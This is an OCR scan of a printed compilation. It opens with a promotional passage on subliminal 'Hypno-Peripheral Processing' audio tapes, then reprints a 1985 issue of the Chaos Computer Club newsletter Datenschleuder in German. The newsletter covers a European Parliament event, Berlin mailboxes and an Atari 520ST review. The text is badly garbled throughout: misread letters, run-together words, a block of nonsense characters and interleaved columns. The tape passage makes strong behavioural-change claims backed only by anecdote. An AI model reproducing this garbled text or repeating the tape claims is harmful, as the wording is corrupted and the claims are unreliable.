floater’s receptivity to new informalion. Now,
New York psychologist Dr. Lloyd Glauberman
in collaboralion with neuropsychologist Dr.
Phil Halboth has devcloped a new way of using the hyper-rcceptivity
induced by floating: hc has crcated a series of extraordinary audio tapes
spccifically designed to be heard while in the flotation tank. The tapes use
state-of-the-art digital rccording technology incorporating the latest
rcscarch in informalion processing and laieralization of functions in the
brain hemispheres lo present messages stimulating rapid and dramatic
bchavioral change, in a technique Glauberman and Halboth call
HYPNO-PERIPHERAL PROCESSING.
Once in the tank, and wearing Stereo headphones, you hear calm
voiccs against a background of stately, soaring Synthesizer music genlly
guiding you into a deeply relaxed state. Then the Soundtrack divides and
you hear a separate voice in each ear, each voice narrating a different
fairy-tale-like story—charming tales of wizards, magic cities,
intergalactic zoos, mystic shoemakers and dream machines. ‘The
simultaneous input overloads the conscious mind,” says Glauberman,
building cffect."
Hypno-
Peripheral
Processing
Overloading the
Conscious Mind
Graham
Potentializer:
The Pleasures
of Merely
Circulating
“bccause there is simply too much informalion to process consciously.”
Unable to focus on either story, your conscious mind scems to lei go or
tum off.
Using the hypnolic tcchniques of Milton Erickson, with elements of
neurolinguistic programming, Glauberman and Halboth have loadcd the
tales with a variety of powerful suggestions, though the suggestions are
couched in indirect terms and seem simply pari of the story, so that thcy
go undetccted. Also, since the mind can at best focus on one of the stories
(and usually gives up and stops paying conscious attention altogether),
most of the stories themselves, and the hidden messages thcy contain,
bypass thc consciousness entircly, enlcring the unconscious mind.
Tolopoff this barrage ofinformationaloverload, yetanolher series of
suggestions has bcen imbedded in thc tapes by an imaginative combining
and interweaving of words and phrases from the two separate sound
Iracks in such a way that they can only be perceived peripherally by the
combined functioning of bolh brain hemispheres.
Thus far Glauberman and Halboth have created a series of 14 tapes
(with applicaüons that include increased creativity, enhanced problem
solving abilities, weight loss, stress management, improved time man¬
agement and reduclion of smoking and drinking, among others). Most of
their clicnts float oncc a weck while listening to the appropriate tapes. In
a recent informal study of these subjects, Glauberman and Halboth
discovered that the combination of the tank and the tapes “had a definite
and profound impact on everyone.” I pcrsonally have tested these tapes
out on a variety of individuals and have bcen impressed with ihcir
effeclivcness.
Oflen, the responses to thc tapes were unexpected. “One man was
Corning to me for depression," says Glauberman. “A few days after
listening to a tape, he came to me with excitement and told me that the
panic attacks he had whenever he came into New York had abruptly
disappeared. Well, he’d nevereven told me he was having these attacks!
1 lookcd over the peripheral messages on the tape he’d heard and found
that one of the tales mentions offhandedly that the central character, who
is exploring a magic cily, ‘feit comforlable now in the city.’ Apparently
Ihe man’s subconscious had feit the need for that change and had
somehow opened itself up to that specific message ffom the tape. This
suggests that an unconscious Scanner is at work to select indirecthypnotic
or subliminal messages that have meaning for the person’s life.”
Though designed to be used in the float tank, it has been discovered
ihrough extensive experimentation that the HPP tapes are equally effec-
tive when any tool is used—Synchro Energizer, Graham Potentializer,
etc.—that is effective in puiiing the user in that state of extraordinary
receptivity to new information and to behavioral change or “rcimprint-
ing” that accompanies thc Ihcta state.
To leam more about brain boosling deviccs, including addresses of
manufacturers, and for further informalion, including news of new
devices and thc latest rcsearch in the field, write: MEGABRAlN, P.O.
Box 1059, Cooper Station, New York, NY, 10276. For an in depth
accountofbrain-altering technology,consultAfegaBram.-AlewToo/s and
Techniques for Brain Growth and Mind Expansion,
BRAIN-TECH heißt eine junge Firma in Heidelberg (Panorama¬
straße 29), die sowohl das Buch MegaBrain vertreibt wie auch einen
Großteil der hier beschriebenen Geräte. BRAIN-TECH ist auch der
Titel eines Buches zum Thema, das innerhalb der Reihe Der Grüne
Zweig im Winter 1988 erscheinen wird.
Was hallen Sie als Außenstehender von Intelligenz?
.. .nachdrücklich empfohlen
Hier sind sie, die lang erwarteten Nachdrucke von daten-
schleuder 13 bis 25.
Diesmal ist wohi keine Panne passiert wie bei Teil 1 der
Hackerbibel; dort war ausgerechnet in der allerersten Ausgabe
der Datenschleuder bei den „Aufgaben für die nähere Zukunft"
der Punkt 10 „Alles was Spaß macht und nichts kostet" unter
Totenköpfen verschwunden.
Weggelassen wurden diesmal - absichtlich - nur überholte
Bestellfetzen.
Geschaffen nach dem Vorbild der tap und trotzdem anders
- siehe Hackerbibel Teil 1 - wurde die Datenschleuder, das
wissenschaftliche Fachblatt für Datenreisende im Orwelljahr
1984. Jetzt erscheint sie im fünften Jahr.
Die Zeitschrift wurde und wird ehrenamtlich produziert. Die
einzigen, die bezahlt werden, sind die Post fürs Porto und die
Drucker (und letztere nicht immer sofort - danke fürs Ver¬
ständnis!).
Die Datenschleuder ist in vielem unüblich und jede Ausgabe
bringt eine neue Mischung mit amüsantem, brisantem, aktuel¬
lem oder aktuell werdendem Material aus der Welt der Daten¬
reisenden.
Wir wünschen viel Spaß bei der Lektüre!
C9927F
DM 2,50
S)aten§tf)lettbet?
Oktober-Ausgabe Nr. 13/85
Das wissenschaftliche Fachblatt für Datenreisende
Ein Organ des Chaos Computer Club
Im NovembGr erscheint 74/85 * Schwerpunkt Freuen und Computer
Das CHAOS-TEAM macht mobil:
EURO-NOTRUF Strassburger
f
Die technologische Herausforderung
Das Euro-Parlament (EP) stellt seine nächste Sitzung in Strassburg vom
7. bis 11. Oktober 1985 unter das Motto "Die technologische Herausfor¬
derung". Neben einigen eigenen Berichten und Debatten über die
"Herausforderung" von USA, Japan und dem Pazifik-Becken findet ein
Symposium und eine AUSSTELLUNG statt. Auf ihr sind allerlei europäi¬
sche Firmen mit ihren Robotern und ähnlichem vertreten.
Unter anderem ist geplant; keilen, ein kreuz-und-quer (ür menschliche Be¬
ll Zehn Berichte des Parlaments und Debatten dürfnisse. Auch der Fotokopierer ist nicht ein-
zum Thema neue Technologien: fach ein Herrschaftsinstrument, sondern auch
Euro-Party
Zusammen mit den Kollegen vom KGB (München)
partyzipiert das CHAOS-TEAM vom 7. bis 9. Oktober
an der EP-Sitzung in Strassburg und besetzt ein
Büro. Dort und in der Umgebung wollen wir unsere
Interessen und Ansichten zu den neuen Technolo¬
gien nutzen und diskutieren. Während dieser Zeit
ist das CHAOS-TEAM am Daten-und Telefonnetz
erreichbar.
Gezeigt wird Mailbox-Kultur und Ansätze zu einer
Informationsgesellschaft von unten sowie Berichte
über Machtumverteiiung durch Nutzung neuer
Technologien. Die Teilnahme des Chaos Computer
Club am Blödeltextsystem der DBP (Btx) hat ver-
■ Europa gegen Usa/Japan
■ ein europäischer Forschungsraum
■ die technologischen Probleme, die sich aus
dem Beitritt von Spanien und Portugal ergeben
■ Technologietransfer
■ die Auswirkungen der neuen Technologien für
die europäische Gesellschaft
■ die sozialen Auswirkungen der neuen Tech¬
nologien
■ neue Technologien und Schulbildung
■ europäisches Technologiefclgeabschätzungs-
institut (tolles Wort)
• europ. Weltraumpolitik
■ neue Technologien im Transportbereich
■ Frauen und neue Technologien
2) Allgemeine Rede-Orgie von Dienstag bis
Mittwoch
Symposium mit erlauchten und erwählten Gä¬
sten von Lothar Spaeth über den Chef von
Olivetti, der EG, Ciba-Geigy. Battelle-Institut,
allerlei Computer- und sonstigen Wissen¬
schaftszeitungen, DGB. CERN na und so weiter
und so fort, bloß keine einzige kritische Seele.
Wir können das leider nur über Video verfolgen,
da wir wohl alle nicht erlaucht genug sind.
Teilweise sind die Leute ganz interessant, eben¬
so der Tross von ausgewählten und eingelade¬
nen Fachjournalisten aus ganz Europa,
Ausstellung: europ. Weltraum Agentur. Airbus.
Siemens. AEG. Max Planck. Thomson. Bull.
Philips. Sinclair. Bayer. Henkel usw. 50 Unter¬
nehmen zu Computer. Telekom. Biotechnik, al¬
ternative Energieträger, Weltraum. Laser ...
ESPRIT; EURONET-DIANE. JET; RACE: und wie
die Europrogramme alle heissen. Auch dabei
die Informatik-Abteilung von EG und EP.
Uns geht es darum, zu zeigen, daß Computer
nicht nur eine Sache der großen Firmen für
Rationalisierung. Überwachung, Kontrolle,
Steuerung etc. sind. High Technologie ist auch
low down on the base wichtig. Neben dem
üblichen von-oben-nach-unten oder unten-
das Ende bestimmter Zensurformen. Langsam,
aber sicher entsteht bei den neuen Technolo¬
gien eine Gegenkultur.
Bisher denken die Freaks oft genug nur neue
Programme usw. aus und blicken (nurl) da
durch, aber eine Kommerzmafia vertreibt und
kontrolliert das ganze in grossem Stil.
Da stellt sich die Eigentumsfrage aus der Sicht
des Systementwicklers und der Gesellschaft:
Wem gehört eigentlich das ganze Wissen, das
da akkumuliert wird? Sind Informationen eine
Ware wie jede andere auch oder steckt in ihrer
Erscheinungsform, aber auch in der ganzen
Umstrukturierung von Kontrolle. Steuerung,
Wissen = Macht usw. eine neue Melodie? Radi¬
kale Öffentlichkeit, freier Fluss von Daten und
Informationen ist doch viel effektiver - von
gerechter ganz zu schweigen! Und wohin geht
die Reise, genauer; Wer will wohin? In Diskus¬
sionen wollen wir darüber nachdenken und
Gegenpunkte setzen im Angesicht der europäi¬
schen Hurra-Patrioten, die nicht mal mit nem
Taschenrechner umgehen können, aber ständig
"Bekennen", dass "die" neuen Technologien
tierisch wichtig wären, überall emgeführt wer¬
den müssen und Europa sich gegen USA. Japan
und das ganze pazifische Becken durchsetzen
müsse, konkurrenzmässig & blind.
Nur reden genügt nicht, klar; aber der Erfah¬
rungsaustausch ist wichtig. Aha-Erlebnisse
gibts. wenn was nicht oder anders funktionieri
als vorgesehen. Ne andere Frage, keine Frage,
ist die Datensicherheit in Europa; wieder ne
andere die Borniertheit von Bürokratien wie der
Deutschen Bundespost und verwandten euro¬
päischen Vereinigungen. Eine ganz banale Ge¬
schichte, auf die die einige europäische Parla¬
mentarier scharf sind: die EG-Kom.mission ver¬
weigert ihnen konsequent den Zugang zu be¬
stimmten internen Datenbanken. Dabei soll das
Parlament doch gerade kontrollieren!
Wenn die nun mal sehen könnten was sie nicht
deutlicht, was alternative Informationsdienste in
neuen Medien machen können. Das ist mehr als
nur Salz in der kommerziellen Suppe.
Jetzt führen zunehmend Firmen Mailbox-Systeme
zur Sachkommunikation (Bestellwesen u.ä.) ein,
ohne die-Hintergründe uncf die Veränderungen von
Informationsstruktur und der Datenilüsse im ein¬
zelnen zu erkennen.
Gerade die elektronischen Briefkästen und Schwar¬
zen Bretter verformen die bisherigen Machtstruk¬
turen. da jeder Teilnehmer (ohne an einen Amts¬
weg gebunden zu sein) direkt agieren kann. Manch
kleiner Sachbearbeiter merkt durch die neue An¬
schaulichkeit im Datenfluß, daß sich etliche Vorge¬
setzte nur durch das Weiterleiten von Ideen der
unteren Chargen auf ihren Posten behaupten. Doch
auch die negativen Folgen, die sich durch das
elektronische Überwachen von Privat-Post in
Mailbox-Systemen ergeben, müssen analysiert
werden, Erfahrungen über "Postkriege" in größe¬
ren US-Firmen liegen vor.
Weitere Themen und Anregungen für die Straßbur¬
ger Euro-Party:
■ Datenbarken der EG. zu denen das EP keinen
Zugrifl hat und was dort alles drinsteht
■ "Volks-Computer": Mailboxen-Kultur etc.
• Neue Techniken bei Grünen und Alternativen
■ Chancen neuer Technik bei der Aufdeckung von
Skandalen am Beispiel von Greenpeace
■ Die Postverwaltungen: Hüter sozialer Daten-
Gerechtigkeit oder Hanswurst gegen die Medien-
uno Datenkonzerne
■ Daten: Grenzüberschreitungen und Hindernisse
• Praktische Kritik an sinnloser Computerisierung
■ und so weiter und so fort.
Der Phantasie sind wie immer nur die eigenen
Grenzen gesetzt. Ideen. Anregungen. Texte, ... an
CHAOS-TEAM über die Datennetze. Möglichkeiten
des Büros werden genutzt, um diese Anliegen zu
verbreiten. Ausführlicheres Programm liegt noch
nicht vor. Es wird alles schon irgendwie klappen.
Ter.min: Mo.. Die. und Mittwochvormittag.
Werft eure Imaginationsmaschinen an! ct
europafß.ws 850929 2140
nach-oben. dem zentralistischen der neuen sehen sollten. . . by h.
Technologien gibts auch dezentrale
Möglich-
INHALT; Inhaltsverzeichnis Datenschleude 13/85
1 EUROPA: die Europa-Seite mit einem Euro-Nolruf, Treffen in
Straßburg, Euro-Party von Computerfreaks.
1 CCORTS: Zahlen. Daten. Fakten. Adressen.
2 TRANSl: Berlin und die Welt: Chaos mobil - ein Reisebericht.
2 KULTUR: Mailboxen in Berlin.
2 POSTAN: Am |FA-Poststand. Furunkelausslellungsbesuchsbericht.
2 WELTDS: Die Welt am Samstag. Drucker&Rolls Royce von Becker.
3 ATA520: Der 520er. Innenleben und Umfeld. 520 DalensalTOS.
3 ATACHA: Standardisierte Vernetzung worldwide: Chaos-Pläne.
3 BASTAR: Der Bastard-Blitz. Ein Bündel ATARI-Anwender.
4 ISDNOB: Post Future?
4 BUCHSE: Heynes Halbschnellschuß. Militär gegen Hacker. Netzweber.
4 IMPHES: Das Impressum. Immer wieder aktuell.
5 COSYPG: Das Cursor Operation System,
5 KIWIPG: Schönheit in Waffen. Ein neues Buch.
6 FMANLA: Die Katze darf das Telefon abheben. Mailboxrecht.
6 GEBUER: Der Gebührenprüfer schlug zu.
6 DIGDNK: Digitales Denken. Ein mahnender Artikel.
6 BURKHA: Schmierkram.
6 GELDPR: Eine Geldscheiniressergeschichte.
6 POSTEF: Warum die Post Probleme beim Briefkastenleeren hat.
7 ??????: Aus der Hackerbibel entfernte Werbeseite.
3 KURZZZ: Kurzmeldungen.
8 MLUHAN: Wohin steuert die Welt. Eine Buchrezension.
0 IFA-85: Einem großen Teil dieser Auflage liegt die ds-Ausgabe zur
IFA’85 als dreiseitige Rückseite bei. Wir bitten um gnädige Beachtung.
inhalt13.ws 850930 1845
and NOWASÖf^ABöOr
HOW TEcHNOLoqY
CROSHES YöÜRSOVL...
' “ w (n ^ Q.
^ m S ä “
O — JC
- lyi ^ a c u
= o S S'Sxö
■) k- X ^ ^ jz c
^ a —- c ^ c u
^ o cC05
= O m^ 5 sS
BCV o w^og
: -v) —O- - 5 ; g g §
: oio .-z:oSa
". Ti 5 y < V rv -
jOjCDJu ._-5:
5 "o o) oj o O 2 -
- 2!> 9 oS
3 ■ —3
jIT?
juuuu
JUUU< oX o c
JOUGUclcq o b
Chaos mobil
Transit durch die DDR
Fehler beim BKA
On the road. Auf dem Weg von Hamburg nach
Berlin, kurz hinter dem Horner Kreisel. 5 Leute
im Granada, nicht ganz optimal, gehl aber. Wir
erreichen die Grenze (West) mit der Musik ihrer
Herren, der amerikanischen Nationalhymne-
Rechtzeitig zum DDR-Grenzposten kommt die
russische, die gefällt mit besser. Trotzdem müs¬
sen wir warten, zwei von uns haben keine
Pässe, einer davon nicht mal einen heilen
Perso. "Hier haben Sie Ihre vier Dokumente
und einen Lappen,meint der Grenzer, der
den Transit deshalb verweigert Man hätte die
Seite doch vorher einkleben sollen.
Bei der Rückfahrt von der Nichtfahrl eine kleine
Kontrolle durch unsere grünen Jungs, Jetzt
werden fünf Leute durch verläßliche Beamte als
Berlin-Rückkehrer gespeichtert. Das ist natür¬
lich Unfug, denn vier fahren gleich darauf hin.
Nur einer muß nach Hamburg zurücktrampen
und sich einen neuen Ausweis besorgen- Das
ist gespeichertes CHAOS im BKA-Compuier. Da
hilft auch keine Rechtsschutzversicherung,
Für uns vier das ganze nochmal Kassette mit
Nationalhymnen rein, Pässe raus, warteri
Nachdem die Identität des Persoinhabers mit
sich selbst durch die Zahlung von 10 Mark
bestätigi werden worden ist, gehts zu viert
weiter. Das Telefon ist keinem aufgefallen und
die rote Kelle hatten wir vorher zugedeckt. Oer
Fahrtkomfort ist seit der Grenze erheblich ge¬
stiegen, man macht es sich gemütlich, Small¬
talk. der Zigarettenkonsum steigt. Schilder mit
eigenwilligen Geschwindigkeitsbegrenzungen
si^ie das Zählen vonn Autos im waid machen
die Fahrt zu einem faszinierenden Erlebnis Wir
wollen am Intershop halten, einen Kafiee trin¬
ken, aber da ist alles dunkel. Mond und Nebel
und ein paar parkende VES-Lastei Wir fahren
weiter. Gegen ein Uhr erreichen wir die Grenze,
diesmal geht alles schneller. Dann Berlin. Ouar-
tiersuche ohne Staotplan. Eine Telefonzelle ret¬
tet uns, da die Aussagen der Passanten zu
unklar waren. Es lebe die Post. Oeep
Der fünfte Mann fliegt
Oer Tramp zurück war gut, Em LKW-Fahrer. der
regelmäßig OOR-Touren hatte, hielt gleich. Er
erzählte von seinem Berufsfahrersilz. Aut bun¬
desdeutschen Straßen gehen derartige Sitze zu
Lebenszeiten des LKW eigentlich nie kaputt.
Auf ODR-Slraflen halten sie rund em Jahr,
Am nächsten Morgen wollte er mit dem Flug¬
zeug nach Berlin. Er schaffte es. innerhalb von
10 Minuten (normale Bearbeilungszeit: eine
Woche) einen neuen Personalausweis auf der
Meldebehorde zu bekommen. Das Flugzeug
erreichte er noch gerade so
Merke: Auen Beamte körmen sehnen sein. Sie
müssen nur ein Einsehen haben. Und braucnst
du dringend einen neuen Perso und hast keine
Woche Zeit, brauchst Du keinen Beamten be¬
stechen. Du buchst einen einfachen Flug nach
Berlin (nur hin) und gehst mit dem Ticket und
deinem kaputten Perso zur Meldebehörde. Das
ist fast alles. LS 1t1 t'ans.T3»sa3cn?9(wi!)
CCC- Berlin:
Hey Freaks. Hacker, Craecker und sonstige Unru-
hesliher Da ihr anscheinend alle der Meinung
seid. Berlin sei das Cenirum der deulschen
MailbovScene. werden euch nun einige Gesicht¬
spunkte dieses Anliegens nahe gelegt Einige von
euch sind der Ansicht, hier gaebe es Mailboxen,
wo man in einigen Rubriken lachen kann, m ande¬
ren reden bis man schwarz vor Schilling wird und
m wieder andeien sein Intormationsniveu kullivie-
ren kann Leider bedarf es sich euch zu enttaeu-
schen. In Berlin gibt es zur Zeit mehr als 20
Mailboxen, aber nur 5-6, sind akzeptabel. Der
erbaermliche Rest zaehll sich zu den wahren
Mehlboxen, deren Besuch nicht zu lohnen scheint.
Die richtigen Berliner Freaks tretlen sich aus¬
schliesslich in den anerkannten Boxen, wobei nicht
zu unleislelien sei, daß Oie nicht ernstzunehmen
sind, die die anderen Boxen aufsuchen Grob
lassen sich die Berliner User in S Kategorien
einordnen:
1. Die Begeisterten- Das sind die Leute, die zuviel
Geld haben und fast taeglich dem Gilb ihr Bahres
opfern, indem sie jede Box besuchen um zu sehen
ob sich was geaenderl hat, jedoch selten etwas
kreatives leisten ..
2. Die Stimmungsmacher- Das sind Uspr.die alte
paar Tage m ihre Stammboxen schauen und mchta
besseres zu tun naben, als leden den sie erwi¬
schen. anmachen und verarschen. Also Typen, die
jeden versuchen uhers Ohr zu hauen, was sogar
dazu fuhren kann, dass sie aus der Mailbox fliegen
3 Oie Ernsten- Das wiederum smd Leute, die jede
Woche mal m die Box reinsehen um mit den
Problemen des Alltags die armen Halbleiter voll
zumütien Ernst zunehrnende Kreativitaet ist dabei
allerdings nicht wahrzunehmen.
4 Oie Kinder Das sind Troopies und Halbstarke,
die nur hineirschauen um zu kontrollieren, ob S'e
auch ja noch im Besitz der neuesten Compuierga-
mes sind, sie gehen natuerhch in kemor Wciso auf
andere cm
5 Die Hacker- Dies sind homo sapiens, deren
einzigstes Interesse aus der^ neuesten Passwörtern
und Nuas besieht Mil mrem nicht endenden inror-
mationshunger werden die Mailboxen erst zu
einem neuen inferesaanie'> Medium.
Mailboxen sma natueriicn nur so gui wie ihre
SysOp’s. was oft vom Alter und den Programmior-
kenntnissen der Typen abhangi Da gibt es m Berlin
nun rund 20 Boxen, von denen ca. 12 mit der
gleichen Software laufen, und die SysOp's zwi¬
schen 14 und <7 Jahren alt sind. Die meisten
Mailboxen laufen auf C-64 mit z Teil 2-3 Fioppys,
anders wiederum benutzen PC's mit Festplatten.
Was ist nun so interessant an den Berliner Boxen-?
- Eine Umlrage ergab, daß die Sexecke (nur ir>
einer Box vorhanden) knapp vor den Pinboards
luhrt. welches sonst immer ganz vorre steht. Da¬
nach lolgen die Rubriken wie Usergroup. Hacker¬
group, Inlos. SolLHardware-Berichle. Erfahrungs¬
austausch (was immer darunter zu verstehen
sei...), ßerichle aus der Bundesrepublik und die
lebensnotwendigen Informaiionen des Datex Net¬
zes. ln der Sexecke gibt es inzwischen schon
richtige Forlselzungsromane von Or Know Char¬
lotte im Taumel der Lust, was bei einigen Usern
der absolute Renner zu sein scheint Hier einige
Nummern (Berlin Vorwahl. 030)
CIZ 6118502/ Teletext 7850500/ Gerbnet 4144068/
Compac 8024228/ Coko 4652439/ CCS 7868178.
by ede worked Oy obeiix. kviiuri3ivsa50930 i8ii
Oie
Poststandbesuch
Wie in der Vertagsbeiiageangekündigi. besuch¬
te ein Teil des CCC sowie bayrische KGßier auf
der Internationalen Furunkelausstellung '85 den
Poststand uf>c lud alle Freunde zu einer Hac-
kerparly.
Die Meldung rrvachte schnell die Runde, dabei
war die Papierverteilung effektiver als die Btx-
Arkündigung. Es fander> sich gut 100 Leute ein.
die alte irgendwas hören und sehen wollten.
Harniirger, Bayern und Berliner bemühten sich
gemeinsam Die vier Seiten der IFA-
Sonderausgabe wurde eifrig verteilt, sie liegen
für all diejenigen, die keine Chance nahen, m
Berlin zu rechten Zeit am rechten Ort zu sein
dieser ds bei.
Wir brachten wie angekündigt Faßbrause mit,
nicht etwa urn die Mäuler zu verkleben, sondern
um die Stimmung gleich von Antanq an zu
heben, und um den Schwarzen Schlingel damit
zu bewirten, doch dazu sollte es nicht kommen
Wie von der Post geplant begann besagter kurz
nach 15 Uhr mit dem Verteilen von Preisen-
eines Wettbewerbes Nachdem er die Bühne
beirefen halte, wurde er etwa eine Minute lang
vom Publikum weiches nicht allzu groß war.
ausgepfiffen und gebuht. Was ihn aber nicht
weitet zu stören schien als selbsternannter
Buhmann der Nation". Gegen 1$ Uhr begaber
Sich von der Buhne auf eine Empore zwecks
des besseren Überblicks über die emtrudelnden
User mit atypischem Benulzerverhaiien" und
das fing an. was erst knapp zwo! Stunden später
enden sollte.
Im Freien war es. wie im ds-Extrablatt angekün-
digt. grau und zudem feucht. Freundlicherweise
stellte uns die Poststandleitung den Persona-
laufenthaltsraum zur Kommunikation zur Verfü¬
gung Hierfür sei nochmals gedankt, wir naben
uns wohl gelühli Wegen der Enge war trotz
stickiger Luft ein “tn Ohnmacht lallen" unmög¬
lich ^hon das Durchreichen von Pappbechern
ward zum Problem
Das ganze war etwa so wie ein Famiheniretfen.
SO eng. so laut, so fröhlich. Man traf Leute, die
man sonst nur via Chat oder mail kannte und
knupfie neue Kontakte zu Leuten, die man noch
nicht kannte und es war Gelegenheit, einige
falsche Berührungsängste zur Post abzubauen.
Es endete damit, daß man sich die Lasershow
der 08P ansah, was man sich hatte schenken
können Die Grafiken waren zwar teilweise ganz
brauchbar Ein Qrundproblem der Post Die
Technik klappt, aber die Kombination von For¬
men Farben u-^d Musik war künstlerisch wert¬
los
Fazit; Ein gelungener Nachmittag, auch wenn
die Erwartung einiger Gaste, die auf einen
Vortrag hofttea enttäuscht wurde
Statidessen gab es eine unüberschaubare Men¬
ge kleiner Gesprächsgruppen, was aber voll
und ganz durch die vielen neuen Kontakte
aufgewogen wurde 111
0OSlan13 WS 850929 2303
Inflation
aus: CoEvoultion Ouarterly 30/1981
D-e Samstagausgabe der Well ist immer besonders luslig Zwar heiOi der V/irlscfwtlsieii jetzt mehr mehr -Well der
Wirtschaft und Fe'nsehen sondern nur noch Well der Wirischafl' . aber unter 'Geistige Well" hndet sich Als der
Dudeisacli noch als AngnifstvaMe galt Auf der 'Wiascnschatt --Seite cm Betrag' Horchgerät für faule FrucNie- MikfoTone
regisirieren FreOgerausche von Insexien Ais Aufmacher aut der Wissenschahssetie die moniere Frage nach Paßkon-
iroiie am KrarxenbetP . Die Unierzene beqinni mi| Mediziner fordern, .
□■e Sd'ie Zwei ö'ockf Ojc EniwcKiung zur G echberechfigung mii emem neues Scfiimpfwort lors Lesevo* Oie
Oucienfrauen kom.T.en- Und Geißler dessen Ruckint; den Frauenanteil m der Regierung um W** eihohie. ergre,fl
umer - Wcilnachftchien - Partei für dic nicni gie-chberechfigien Ehemänner 'Die famitie isl für uns der withiigsie Orl
der Gleichberechtigyng- und fordert - Euiehunosgeid für Vater
Eine Untersuchung im Kindergarten zeigte daß Durchsetzungsvermogen dann besieht, anderen bei unwichiigen Dingen
nach dem Maui zu reden und bei wichtigen iiuf Eigenmleressen zu vertreten Geißler hat zumindest das begr.lten.
Auf der 24 findet sich em "Kiemes Welithealer" und nicht die Witzseile. Aufmacher: Unser winziger Postmimster mit
Riesenkopf s<tzt im Fischkutter und langt fernsehgeile Fische im Kabelnetz. Oie NeUoffnung ist bildschirmldrnrxg. CSS
dreht an der KaCelnelzlrommel.
Wie in einigen anderen Samstagzeitungen außer der taz findet sich eme Anzeige für EPSON-Orucker, Es wurde noch
I hingenommen, wenn sie einen ' Volksdrucker liefern würden Aber sie denken eher an Rolfs Royce, dert sie großer
abbilden afs ihre kleinen Drucker. Daneben ein Mietangebot: 50 DM/Woche für enen LO 1500. Das isi kern anderes
Holz-Reisemob'l- sondern ein Drucker. "Ox emen Tag im Rolfs Royce mi( Chauffeur zu gewinnen' links daneben die
Vefheißi/ng, Selber lanren verboten. Der RR hat das Kennzeichen D-FX 105 und isi von Al/TO-Becher In der 'AUTO-WELT"
reklamiert etliche Seifen weiter unter dem Artikel 'Freier Himmef auiomalisch' Auto-6ecker. das 'mieressaitteste
Autohaus der 'Well'. Neben einem vom vielen Nachdrucken matten RR-Logo gibts ein zehn Jahre gereihes Modell
fKifomeiersfand genau €B 256 km) für genau 169950 DM Afs Erfschädigung rn der 'Geistigen Welf' Peter Glaser 'Guten
Tag. ich bin Lucy'. Eme Eriahiung. von der zu Mfen isf. daß sie wenigstens em paar Weil-Schreiber begreifen.
Peter beschreibt, was passiert, wenn dm Weit, die er als Autor schafft, ihn zuhause besucht wel(«tef3 ws 933929
Hilferuf
ap Newent - Der Engländer
Frederick Cooper (07) in Newent
wußte, was zu tun war. als er irtit
einer Schere in einer Baumkro¬
ne saß und die Leiter plötzlich
umfiel. Er zog sein schnurloses
Telefon aus der Tasche und rief
die Feuerwehr an. Dort hielt
man seinen Anruf für einen
Scherz. Eine halbe Stunde spä¬
ter rief der Mann die Polizei an,
die zwei Beamte schickte. „Ich
war in meiner Jugend Pfadfin¬
der“. sagte Cooper zu ihnen.
enoiw ziwoiul uoy e"iiltVT9V9
everylhing you do is right
520 DatensalTOS
Experimente mit einem zukünftigen Computer
Keine Frage, der 520er ist die nächste Hackennaschlrte. Von den Wenns und Abers hier etn erster Bericht.
Seil kurzer Zeit wird ift Hamburg der dofl erste 520ST Rechenreit zur FUSED-PAL-Anatyse braucht. Gesetz und ist der Projektname tur ein Network
in einem großen Kaulhaus von fachunkundigem Per- Der TV-Modutator wurde eingespart. Zu Recht, denn Dnented Minimal Operation System . das m ein 520er
sonal bewacht. Füttern verboten. wenn schon ein C&4mit Fernseher ein flaues Bild gibt, Eitersion-Rom kommen soll. Ins Rom kommt auch die
FreufWe diebereitseinenhaben, berichten, daß das kannman640'4COPixeiautBiiligmoniforenveigessen. User- bzw. Geratekermung nach Amateurfunknorm
milgelieferte Kermil eine leicht "negative Versions- Angenehm ist die Maus Das ist eine Art Steuerpult Nichf-Amateure und Geräte kriegen nicht zugeleilte
nummer" hätte Und da» Betriebsaysiem ist das ROM für eine Hand. Man legt die Hand drauf und kann auf Rufzeichen, damit das System aulwartskompatibel ist.
nummer" hätte Und da» Betriebsaysiem ist das ROM
noch mehl wert in das es gebrannt werden müßte und
vwrd aul Floppy geltetert Ein ROM-Update ist lür
irgendwann und 150 DM angekündigt
Trotzdem interessierte rrach der 520er so. daß ich ein
oaden-wurttembergisches Klemstadtchen besuchte:
Dort konnte ich bei ein^ Art Computer-aul-derrv
Bauernhof-Shop einen gleich mitnehmen
Er sei komplett getestet" versicherte man uns, bevor
wir mit drei Kartons nach unerquicklichen Preisver-
handlungcn verschwanden
Nach dem Auspackm ergaben sich Berge von Kabeln
und diverse graue und schwarze Kästchen
Oip Tastatur erweckt einen guten Eindruck. Oie zehn
schrägen Funktionstasten sehen schick aus Aber hall
mal beroe Hände nebenemarxier vor dich in die Luft,
acht Finger parallel die um 4S Grad aüMewinkelten
Daumen berühren sich und bilden mit den Zeigefingern
emgroflesw Du kannst Oieseswi-ursiv steilen, indem
Du den Winkel links für F1-F5 verminderst (geht be-
dem Tisch rumrollen und gel^entlicfi auf ein oder
zwei Kröpfchen drücken. Attrakiiv und praktisch Soft¬
ware zum Erstellen von Leiierplanen wäre bei 640'4CO
Pünktchen (guter Bildschirm) erwünscht, wird aber
noch aul sich warten lassen.
Die Bauart der Maus (aufschraubbar) ist einfach und
gut. Eine schwere Kugel rollt leicht über den Tisch
und treibt zwei Licnimünien mit je 20 Flügeln (Vorsicht
bei der Demontage - nichts abbrecheni!'). Dia Flügel
unterbrechen die je zwei LED-Strahlen je nach Beweg¬
ungsricht ung.
Auf der Lötseite der Platine sind Minibauelemente
aufgeschwemmt: das größte ist ein I4pin IC. platt und
rasterfTiaßig gegenüber der bisherigen Normalform
um den Faktor 2.54 geschrumpft.
Leider blieb auch hier Atari ein Kabelkrämer ideal
wäre die Infrarotmaus, die selbständig zum Batterie
auiiaoen fahrt, wenn sie nicht gebraucht wird
Ok mag man auf den Luxus noch verzichten, so ist
Eine IfTiplemenlation Oes AX-25-Protoko|is (Dalex-
ahnlich) über die WIDI-Ports soll 520e' üniereinarder
vernetzen, aber es soll auch ube- die V?4 gehen. Das
Wird ncch dauern Unsere Zieivfz'stellung Umbau des
5tOer zur Tetefonmaschine (AniutDeantworter mit
Sprachsjteicherung auf Harrtditk Synthi. Mailboxum-
Schaltung mit automatische- Normumschallung |e
nach Datenträger und automatische Umschauung auf
Fernkopierersende-und -emplangsbetneb - alles m
einem Gerat) und das alles als Multiusersyslem mit
vernetzten Ataris oder anderen Rechnenv die das
AX25-Prolokoll fressen afacha13 ws 850930 0123
Quem) und rechts tut die entsprechende Winkclerho- die Spar-Dokumentation eine Unverschämtheit
huny in der Harxdwurzel weh Das ist die für Tasten
